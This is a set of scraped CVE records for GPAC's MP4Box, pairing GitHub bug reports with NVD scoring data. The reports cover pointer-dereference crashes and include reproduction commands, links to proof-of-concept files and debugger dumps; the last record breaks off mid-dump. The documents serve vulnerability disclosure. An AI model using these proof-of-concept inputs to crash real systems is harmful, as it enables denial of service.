Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [Yes ] I looked for a similar issue and couldn't find any. - [ Yes] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [ Yes] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ **Version:** ``` ./MP4Box -version MP4Box - GPAC version 1.1.0-DEV-rev1574-g8b22f0912-master (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB ``` **command:** ``` ./bin/gcc/MP4Box -hint POC ``` [POC.zip](https://github.com/gpac/gpac/files/7762718/POC.zip) **Result** ``` Segmentation fault. ``` **bt** ``` Program received signal SIGSEGV, Segmentation fault. 0x0000000000544b81 in shift_chunk_offsets.part () LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA RAX 0x6054 RBX 0x6054 RCX 0x0 RDX 0xf23eb0 ◂— 0xcc3900003712 RDI 0xffffffff RSI 0xf3c000 R8 0x0 R9 0x7fffffff7f00 —▸ 0xf22fd0 ◂— 0x6d646961 /* 'aidm' */ R10 0xdda2e0 (_nl_C_LC_CTYPE_toupper+512) ◂— 0x100000000 R11 0x246 R12 0x14 R13 0xffff7f00 R14 0xf9000016 R15 0xf1e710 ◂— 0x7374636f /* 'octs' */ RBP 0x0 RSP 0x7fffffff7f00 —▸ 0xf22fd0 ◂— 0x6d646961 /* 'aidm' */ RIP 0x544b81 (shift_chunk_offsets.part+257) ◂— mov eax, dword ptr [rsi] ► 0x544b81 <shift_chunk_offsets.part+257> mov eax, dword ptr [rsi] 0x544b83 <shift_chunk_offsets.part+259> mov rdx, rax 0x544b86 <shift_chunk_offsets.part+262> add rax, r12 0x544b89 <shift_chunk_offsets.part+265> cmp rax, rdi 0x544b8c <shift_chunk_offsets.part+268> jbe shift_chunk_offsets.part+488 <shift_chunk_offsets.part+488> ↓ 0x544c68 <shift_chunk_offsets.part+488> add edx, r12d 0x544c6b <shift_chunk_offsets.part+491> xor ebp, ebp 0x544c6d <shift_chunk_offsets.part+493> mov dword ptr [rsi], edx 0x544c6f <shift_chunk_offsets.part+495> jmp shift_chunk_offsets.part+402 <shift_chunk_offsets.part+402> ↓ 0x544c12 <shift_chunk_offsets.part+402> add ebx, 1 0x544c15 <shift_chunk_offsets.part+405> cmp r14d, ebx 00:0000│ r9 rsp 0x7fffffff7f00 —▸ 0xf22fd0 ◂— 0x6d646961 /* 'aidm' */ 01:0008│ 0x7fffffff7f08 —▸ 0xf23e50 ◂— 0x73747363 /* 'csts' */ 02:0010│ 0x7fffffff7f10 ◂— 0x0 03:0018│ 0x7fffffff7f18 —▸ 0x7fffffff7f60 ◂— 0x0 04:0020│ 0x7fffffff7f20 ◂— 0x2 05:0028│ 0x7fffffff7f28 —▸ 0xf233b0 ◂— 0x7374626c /* 'lbts' */ 06:0030│ 0x7fffffff7f30 ◂— 0x0 07:0038│ 0x7fffffff7f38 —▸ 0xf1d6e0 ◂— 0x0 ► f 0 0x544b81 shift_chunk_offsets.part+257 f 1 0x544ea7 inplace_shift_moov_meta_offsets+231 f 2 0x54593c inplace_shift_mdat+732 f 3 0x549b09 WriteToFile+2713 f 4 0x53af32 gf_isom_write+370 f 5 0x53afb8 gf_isom_close+24 f 6 0x4115b2 mp4boxMain+7410 f 7 0xb57340 __libc_start_main+1168 pwndbg> bt #0 0x0000000000544b81 in shift_chunk_offsets.part () #1 0x0000000000544ea7 in inplace_shift_moov_meta_offsets () #2 0x000000000054593c in inplace_shift_mdat () #3 0x0000000000549b09 in WriteToFile () #4 0x000000000053af32 in gf_isom_write () #5 0x000000000053afb8 in gf_isom_close () #6 0x00000000004115b2 in mp4boxMain () #7 0x0000000000b57340 in __libc_start_main () #8 0x0000000000402cbe in _start () ```
Untrusted pointer dereference in shift_chunk_offsets.part ()
https://api.github.com/repos/gpac/gpac/issues/1999/comments
0
2021-12-22T12:55:57Z
2022-01-03T11:21:14Z
https://github.com/gpac/gpac/issues/1999
1,086,796,143
1,999
2,951
CVE-2021-46040
2022-01-06T20:15:08.723
A Pointer Dereference Vulnerabilty exists in GPAC 1.0.1 via the finplace_shift_moov_meta_offsets function, which causes a Denial of Servie (context-dependent).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2003" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2003" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:1.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "82DD2D40-0A05-48FD-940D-32B4D8B51AB3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/gpac/gpac/issues/2003
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [Yes ] I looked for a similar issue and couldn't find any. - [ Yes] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [ Yes] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ **Version:** ``` ./MP4Box -version MP4Box - GPAC version 1.1.0-DEV-rev1574-g8b22f0912-master (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB ``` **command:** ``` ./bin/gcc/MP4Box -hint POC6 ``` [POC6.zip](https://github.com/gpac/gpac/files/7763917/POC6.zip) **Result** ``` Segmentation fault ``` **bt** ``` Program received signal SIGSEGV, Segmentation fault. 0x00007ffff7910358 in inplace_shift_moov_meta_offsets () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10 LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ───────────────────────────────────────────────────────────────────────[ REGISTERS ]──────────────────────────────────────────────────────────────────────── RAX 0x5569555e0d34 RBX 0x5555555e0000 ◂— 0x7374626c /* 'lbts' */ RCX 0x0 RDX 0x14 RDI 0x5555555db330 —▸ 0x5555555e0640 ◂— 0x5569555dfab4 RSI 0x1 R8 0x0 R9 0x7fffffff7f00 —▸ 0x7ffff76a15c0 (_IO_2_1_stderr_) ◂— 0xfbad2887 R10 0x7ffff76d927a ◂— 'gf_isom_box_size' R11 0x7ffff78fa0d0 (gf_isom_box_size) ◂— endbr64 R12 0x5555555da950 ◂— 0x0 R13 0x14 R14 0x2 R15 0x7fffffff7fd0 ◂— 0x0 RBP 0x1 RSP 0x7fffffff7fd0 ◂— 0x0 RIP 0x7ffff7910358 (inplace_shift_moov_meta_offsets+152) ◂— mov rdi, qword ptr [rax + 0x50] [ DISASM ] ► 0x7ffff7910358 <inplace_shift_moov_meta_offsets+152> mov rdi, qword ptr [rax + 0x50] 0x7ffff791035c <inplace_shift_moov_meta_offsets+156> mov rbx, rax 0x7ffff791035f <inplace_shift_moov_meta_offsets+159> test rdi, rdi 0x7ffff7910362 <inplace_shift_moov_meta_offsets+162> je inplace_shift_moov_meta_offsets+176 <inplace_shift_moov_meta_offsets+176> ↓ 0x7ffff7910370 <inplace_shift_moov_meta_offsets+176> mov rsi, qword ptr [rbx + 0x38] 0x7ffff7910374 <inplace_shift_moov_meta_offsets+180> movzx r8d, byte ptr [r12 + 0x37] 0x7ffff791037a <inplace_shift_moov_meta_offsets+186> mov rax, qword ptr [rsi + 0x40] 0x7ffff791037e <inplace_shift_moov_meta_offsets+190> mov rbx, qword ptr [rax + 0x30] 0x7ffff7910382 <inplace_shift_moov_meta_offsets+194> mov rdi, qword ptr [rbx + 0x58] 0x7ffff7910386 <inplace_shift_moov_meta_offsets+198> mov rdx, qword ptr [rbx + 0x60] 0x7ffff791038a <inplace_shift_moov_meta_offsets+202> test rdi, rdi [ STACK ] 00:0000│ r15 rsp 0x7fffffff7fd0 ◂— 0x0 01:0008│ 0x7fffffff7fd8 ◂— 0x3fa7125e0eb52b00 02:0010│ 0x7fffffff7fe0 ◂— 0x0 03:0018│ 0x7fffffff7fe8 —▸ 0x5555555da950 ◂— 0x0 04:0020│ 0x7fffffff7ff0 —▸ 0x5555555df7a0 —▸ 0x5555555e5720 ◂— 0xfbad2480 05:0028│ 0x7fffffff7ff8 ◂— 0x0 06:0030│ 0x7fffffff8000 —▸ 0x7fffffff84d8 ◂— 0x14 07:0038│ 0x7fffffff8008 —▸ 0x7fffffff84e0 ◂— 0x0 [ BACKTRACE ] ► f 0 0x7ffff7910358 inplace_shift_moov_meta_offsets+152 f 1 0x7ffff7910e3c inplace_shift_mdat+732 f 2 0x7ffff7915009 WriteToFile+2713 f 3 0x7ffff7906432 gf_isom_write+370 f 4 0x7ffff79064b8 gf_isom_close+24 f 5 0x55555557bd12 mp4boxMain+7410 f 6 0x7ffff74dc0b3 __libc_start_main+243 ───────────────────────────────────────────────────── ```
Untrusted pointer dereference in inplace_shift_moov_meta_offsets ()
https://api.github.com/repos/gpac/gpac/issues/2003/comments
1
2021-12-22T16:27:40Z
2022-01-03T11:23:50Z
https://github.com/gpac/gpac/issues/2003
1,086,989,862
2,003
2,952
CVE-2021-46042
2022-01-06T20:15:08.843
A Pointer Dereference Vulnerability exists in GPAC 1.0.1 via the _fseeko function, which causes a Denial of Service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2002" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2002" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:1.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "82DD2D40-0A05-48FD-940D-32B4D8B51AB3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/gpac/gpac/issues/2002
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [Yes ] I looked for a similar issue and couldn't find any. - [ Yes] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [ Yes] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ **Version:** ``` ./MP4Box -version MP4Box - GPAC version 1.1.0-DEV-rev1574-g8b22f0912-master (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB ``` **command:** ``` ./bin/gcc/MP4Box -hint POC4 ``` [POC4.zip](https://github.com/gpac/gpac/files/7763835/POC4.zip) **Result** ``` Segmentation fault. ``` **bt** ``` Program received signal SIGSEGV, Segmentation fault. 0x00007ffff7544911 in __fseeko (fp=0x5555555e1510, offset=2560, whence=0) at fseeko.c:39 39 fseeko.c: No such file or directory. LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ───────────────────────────────────────────────────────────────────────[ REGISTERS ]──────────────────────────────────────────────────────────────────────── RAX 0x0 RBX 0x5555555e1510 ◂— 0x8013fbad2494 RCX 0x0 RDX 0x0 RDI 0x5569555e1604 RSI 0xa00 R8 0x5555555e0f70 ◂— 0x1400000014 R9 0x7fffffff7f00 —▸ 0x7ffff76a15c0 (_IO_2_1_stderr_) ◂— 0xfbad2887 R10 0x7ffff76d927a ◂— 'gf_isom_box_size' R11 0x7ffff78fa0d0 (gf_isom_box_size) ◂— endbr64 R12 0x0 R13 0x7ffff697e740 ◂— 0x7ffff697e740 R14 0x7fffffff84e0 ◂— 0x0 R15 0x7fffffff8040 ◂— 0x15f RBP 0xa00 RSP 0x7fffffff7fd0 ◂— 0x0 RIP 0x7ffff7544911 (fseeko64+49) ◂— cmp qword ptr [rdi + 8], r13 [ DISASM ] ► 0x7ffff7544911 <fseeko64+49> cmp qword ptr [rdi + 8], r13 0x7ffff7544915 <fseeko64+53> je fseeko64+86 <fseeko64+86> ↓ 0x7ffff7544936 <fseeko64+86> add dword ptr [rdi + 4], 1 0x7ffff754493a <fseeko64+90> mov ecx, 3 0x7ffff754493f <fseeko64+95> mov edx, r12d 0x7ffff7544942 <fseeko64+98> mov rsi, rbp 0x7ffff7544945 <fseeko64+101> mov rdi, rbx 0x7ffff7544948 <fseeko64+104> call _IO_seekoff_unlocked <_IO_seekoff_unlocked> 0x7ffff754494d <fseeko64+109> xor r8d, r8d 0x7ffff7544950 <fseeko64+112> cmp rax, -1 0x7ffff7544954 <fseeko64+116> sete r8b [ STACK ] 00:0000│ rsp 0x7fffffff7fd0 ◂— 0x0 01:0008│ 0x7fffffff7fd8 —▸ 0x5555555df7a0 —▸ 0x5555555e1510 ◂— 0x8013fbad2494 02:0010│ 0x7fffffff7fe0 ◂— 0xa00 03:0018│ 0x7fffffff7fe8 ◂— 0x0 04:0020│ 0x7fffffff7ff0 —▸ 0x7fffffff84d8 ◂— 0x14 05:0028│ 0x7fffffff7ff8 —▸ 0x7ffff77767f4 (gf_bs_seek+452) ◂— mov qword ptr [rbx + 0x18], rbp 06:0030│ 0x7fffffff8000 —▸ 0x5555555da950 ◂— 0x0 07:0038│ 0x7fffffff8008 —▸ 0x5555555df7a0 —▸ 0x5555555e1510 ◂— 0x8013fbad2494 [ BACKTRACE ] ► f 0 0x7ffff7544911 fseeko64+49 f 1 0x7ffff77767f4 gf_bs_seek+452 f 2 0x7ffff7910c98 inplace_shift_mdat+312 f 3 0x7ffff7915009 WriteToFile+2713 f 4 0x7ffff7906432 gf_isom_write+370 f 5 0x7ffff79064b8 gf_isom_close+24 f 6 0x55555557bd12 mp4boxMain+7410 f 7 0x7ffff74dc0b3 __libc_start_main+243 ─────────────────────────────────────────────── ```
Untrusted pointer dereference in __fseeko()
https://api.github.com/repos/gpac/gpac/issues/2002/comments
1
2021-12-22T16:16:38Z
2022-01-03T11:23:34Z
https://github.com/gpac/gpac/issues/2002
1,086,980,660
2,002
2,953
CVE-2021-46043
2022-01-06T21:15:08.130
A Pointer Dereference Vulnerability exits in GPAC 1.0.1 in the gf_list_count function, which causes a Denial of Service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2001" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2001" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:1.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "82DD2D40-0A05-48FD-940D-32B4D8B51AB3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/gpac/gpac/issues/2001
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [Yes ] I looked for a similar issue and couldn't find any. - [ Yes] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [ Yes] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ **Version:** ``` ./MP4Box -version ``` **command:** ``` ./bin/gcc/MP4Box -hint POC3 ``` [POC3.zip](https://github.com/gpac/gpac/files/7763770/POC3.zip) **Result** ``` segmentation fault ``` **bt** ```Program received signal SIGSEGV, Segmentation fault. 0x00007ffff7773949 in gf_list_count () from /home/zxq/CVE_testing/source/gpac/bin/gcc/libgpac.so.10 LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ───────────────────────────────────────────────────────────────────────[ REGISTERS ]──────────────────────────────────────────────────────────────────────── RAX 0x5555555e0010 ◂— 0x7374626c /* 'lbts' */ RBX 0x15 RCX 0x5555555e8230 ◂— 0x33483 RDX 0x2315 RDI 0x5569555e0124 RSI 0x15 R8 0x5555555e8230 ◂— 0x33483 R9 0x7fffffff7f00 ◂— 0x158 R10 0x7ffff76d927a ◂— 'gf_isom_box_size' R11 0x7ffff76a0be0 (main_arena+96) —▸ 0x5555555e8380 ◂— 0x14 R12 0x5555555e29d0 ◂— 0x1473747378 R13 0x5555555e0530 ◂— 0x73747363 /* 'csts' */ R14 0x5555555e81f0 ◂— 0x636f3634 /* '46oc' */ R15 0x1 RBP 0x5555555dfc30 ◂— 0x6d646961 /* 'aidm' */ RSP 0x7fffffff7f28 —▸ 0x7ffff79286ed (Media_IsSelfContained+61) ◂— cmp ebx, eax RIP 0x7ffff7773949 (gf_list_count+9) ◂— mov eax, dword ptr [rdi + 8] ─[ DISASM ]─ ► 0x7ffff7773949 <gf_list_count+9> mov eax, dword ptr [rdi + 8] 0x7ffff777394c <gf_list_count+12> ret 0x7ffff777394d <gf_list_count+13> nop dword ptr [rax] 0x7ffff7773950 <gf_list_count+16> xor eax, eax 0x7ffff7773952 <gf_list_count+18> ret 0x7ffff7773953 nop word ptr cs:[rax + rax] 0x7ffff777395e nop 0x7ffff7773960 <gf_list_get> endbr64 0x7ffff7773964 <gf_list_get+4> test rdi, rdi 0x7ffff7773967 <gf_list_get+7> je gf_list_get+32 <gf_list_get+32> ↓ 0x7ffff7773980 <gf_list_get+32> xor eax, eax [ STACK ] 00:0000│ rsp 0x7fffffff7f28 —▸ 0x7ffff79286ed (Media_IsSelfContained+61) ◂— cmp ebx, eax 01:0008│ 0x7fffffff7f30 —▸ 0x5555555e2974 ◂— 0x140000232b /* '+#' */ 02:0010│ 0x7fffffff7f38 —▸ 0x5555555e81f0 ◂— 0x636f3634 /* '46oc' */ 03:0018│ 0x7fffffff7f40 ◂— 0x14 04:0020│ 0x7fffffff7f48 —▸ 0x7ffff790ffcb (shift_chunk_offsets.part+75) ◂— test eax, eax 05:0028│ 0x7fffffff7f50 —▸ 0x5555555dfc30 ◂— 0x6d646961 /* 'aidm' */ 06:0030│ 0x7fffffff7f58 —▸ 0x5555555e0530 ◂— 0x73747363 /* 'csts' */ 07:0038│ 0x7fffffff7f60 ◂— 0x0 ──────[ BACKTRACE ]──── ► f 0 0x7ffff7773949 gf_list_count+9 f 1 0x7ffff79286ed Media_IsSelfContained+61 f 2 0x7ffff790ffcb shift_chunk_offsets.part+75 f 3 0x7ffff79103a7 inplace_shift_moov_meta_offsets+231 f 4 0x7ffff7910e3c inplace_shift_mdat+732 f 5 0x7ffff7915009 WriteToFile+2713 f 6 0x7ffff7906432 gf_isom_write+370 f 7 0x7ffff79064b8 gf_isom_close+24 ```
Untrusted Pointer Dereference in gf_list_count ()
https://api.github.com/repos/gpac/gpac/issues/2001/comments
1
2021-12-22T16:04:39Z
2022-01-03T11:23:21Z
https://github.com/gpac/gpac/issues/2001
1,086,970,623
2,001
2,954
CVE-2021-46044
2022-01-06T21:15:08.177
A Pointer Dereference Vulnerabilty exists in GPAC 1.0.1via ShiftMetaOffset.isra, which causes a Denial of Service (context-dependent).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2006" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2006" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:1.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "82DD2D40-0A05-48FD-940D-32B4D8B51AB3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/gpac/gpac/issues/2006
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [Yes ] I looked for a similar issue and couldn't find any. - [ Yes] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [ Yes] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ **Version:** ``` ./MP4Box -version MP4Box - GPAC version 1.1.0-DEV-rev1574-g8b22f0912-master (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB ``` **command:** ``` ./bin/gcc/MP4Box -hint POC9 ``` [POC9.zip](https://github.com/gpac/gpac/files/7764491/POC9.zip) **Result** ``` Segmentation fault ``` **bt** ``` Program received signal SIGSEGV, Segmentation fault. [----------------------------------registers-----------------------------------] RAX: 0x5555555e4cc0 --> 0x147472617f RBX: 0x5555555e4cc0 --> 0x147472617f RCX: 0x0 RDX: 0x17 RSI: 0x14 RDI: 0x1400000054 RBP: 0x3 RSP: 0x7fffffff7f78 --> 0x7ffff7910370 (<inplace_shift_moov_meta_offsets+176>: mov rsi,QWORD PTR [rbx+0x38]) RIP: 